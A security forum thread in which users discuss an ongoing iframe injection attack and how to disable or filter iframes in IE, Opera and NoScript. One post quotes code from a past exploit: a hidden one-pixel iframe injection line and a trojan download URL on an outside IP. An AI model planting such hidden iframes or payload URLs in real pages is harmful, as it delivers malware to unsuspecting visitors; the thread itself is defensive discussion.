Ongoing IFrame attack proving difficult to kill

Nasty!

 

I keep iframes disabled through IE. Just curious, would Online Armor detect such a thing?

 

So that means you no longer see I-Frames like this example??

http://www.jaybirdsweb.com/tuts/examples/iframe-test.html

 

Interesting, I blocked ifames with Noscript and can still see the example in the link. Maybe I am misunderstanding the "foribid iframes" option.

Edit: Or that is not an iframe, just an example.

 

It,s iframe. see here.

 

Hi Peter, I just tried it today.

Tools> Prefrences> Advanced> Content> Style Options> tick off Enable inline frames

 

Thanks for posting the link. Even though I have Iframes disabled in IE for every zone I can still see the frame in your link. How else can this be disabled? What did they put the option there for if it's not going to work when disabled?

@Aigle

Where did you get the cool skin & toolbar for Opera?

 

Iframe exploits are nothing new, of course, and achieved notoriety as far back at least to 2004 with Banner Ads:

http://www.secureworks.com/research/threats/iframeads/

A careful reading of the current article shows that all that has changed is the method of delivering the iframe content
onto the user's web page. The end results are the same: to deliver a payload.

Interestingly, the current exploit seems to rely on social engineering:

More devious are methods employing remote code execution. Sans.org documented one using the MPack tool:

MPack Analysis
http://isc.sans.org/diary.html?storyid=3015

An example of searching for vulerabilities when a user connects to such a page was the Postcards exploit.
The source code included this:

Code:

document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');

 var Trojan_Path="http://210.0.219.41/cgi-bin/ie0601.cgi?exploit="; 

The iframe cached another page with five exploits. If one was found, the trojan path above was executed to download exefile.exe.
This was discussed a while back in the Anti-Executable forum to show how easily these types of remote code
execution exploits are blocked with White List protection.


_____________________________________________________

Currently, the discussions in the LUA and SRP threads would show similar protection.

Not all Iframes are hostile. The CSMonitor news site uses them to load changing Spotlght stories:


_____________________________________________________


_____________________________________________________

Iframes are a useful function, and like many useful functions, they have been mis-used by malware writers.


----
rich

 

http://my.opera.com/community/customize/skins/?search=lix

 

See attached picture

 

Yes, that is what is ticked, the iframe in the example still appeared.

Aigle: While I still prefer firefox, Lix is the best skin.

 

I think the difference is probably that the iframe in question is not invoking a script making requests on the browser to offset commands internally but it is simply pulling text out of a ".txt" file and as such it is a legitimate iframe and not considered hostile...

Not all Iframe's are filtered...

 

Hi Hermescomputers:

So you are saying that NoScript does not block all Iframes, but only those that exhibit a specific behavior?

 

Essentially yes, Iframe by design is a good thing that provide a useful service it is the hostile ones that are identified and filtered out.

Someone with more "internal" knowledge of the mechanism behind the Noscript Iframe filter should answer this one... I'm not an accomplished coder so the discrimination algorithm isn't my forte...

 

I'd guess that NoScript only blocks IFRAMEs which pull executable/interpretable code. If an IFRAME tries to pull plaintext content, it will do nothing. Just my educated guess.

 

I use IE6 + Proxomitron and the filter "iFrame/iLayer to Link" converts them to links. I changed this filter so that the URL Match is ^$LST(IFrameAllow) where the IFrameAllow List is a list of all the sites that I allow I-Frames for.

 

Are not these two totally diffreent things?

 

So NoScript is wise. not so dumb in case of iframes?

 

I guess so.

 

No, I meant I use both. Best looking-advantage Opera w/ Lix. Oh no, a which is the best looking browser thread: CLOSED Now, back to iframes.

 

For those who are interested,

Please take a look at my post at the following link which comments about IFrames.

https://www.wilderssecurity.com/showpost.php?p=1207602&postcount=6


Peace & Gratitude,

CogitoErgoSum

 

Doing some more thinking about Iframe filters within Noscript... I think that the dynamic filter only applies to sites on the allow list as sites without permitted scripts would have all Iframes blocked and not only those meeting non hostile criterias...

Just an educated guess but I think it would be the more logical application to the reasons why some Iframes pass and others are blocked...

 

One problem in unchecking inline frames in Opera is that Gmail no longer opens. The ability to use colored text on several of my other forums is disabled without inline frames. It has been more of a pain with it turned off than the risk of leaving it enabled. At least for me.